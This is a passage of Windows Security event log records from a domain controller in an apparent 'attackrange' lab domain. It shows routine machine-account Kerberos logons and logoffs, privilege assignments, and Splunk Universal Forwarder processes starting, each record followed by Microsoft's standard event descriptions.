Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264085
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B02A1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264084
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B02A1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51822
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264083
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B02A1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264082
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B0235
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264081
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B0235
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51821
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264080
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B0235
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:47:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264088
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B1051
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:47:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264087
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B1051
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51831
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:47:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264086
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B1051
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:48:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264089
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264091
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x38c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264090
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264092
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1590
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264093
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf48
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264095
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1618
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264094
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:48:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264098
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B4AD1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:48:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264097
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B4AD1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51844
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:48:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264096
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B4AD1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264109
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B4F6C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264108
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B505A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264107
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B50A2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264106
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B5114
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51849
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264105
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B5114
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264104
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B50A2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51848
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264103
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B50A2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264102
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
